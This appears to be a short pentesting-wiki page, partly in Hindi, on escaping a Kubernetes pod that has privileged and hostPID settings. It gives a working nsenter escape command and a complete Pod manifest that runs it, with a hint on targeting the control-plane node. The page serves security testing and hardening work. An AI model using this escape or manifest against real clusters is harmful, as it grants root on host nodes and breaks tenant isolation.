Pod Escape Privileges

Support HackTricks

Privileged and hostPID

इन विशेषाधिकारों के साथ आपके पास होस्ट की प्रक्रियाओं तक पहुंच होगी और होस्ट प्रक्रियाओं में से एक के नामस्थान के अंदर प्रवेश करने के लिए पर्याप्त विशेषाधिकार होंगे। ध्यान दें कि आपको संभावित रूप से विशेषाधिकार की आवश्यकता नहीं हो सकती है, बल्कि केवल कुछ क्षमताएँ और अन्य संभावित सुरक्षा बाईपास (जैसे apparmor और/या seccomp) की आवश्यकता हो सकती है।

बस निम्नलिखित में से कुछ चलाने से आपको पॉड से भागने की अनुमति मिलेगी:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

कॉन्फ़िगरेशन उदाहरण:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
HackTricks का समर्थन करें

Last updated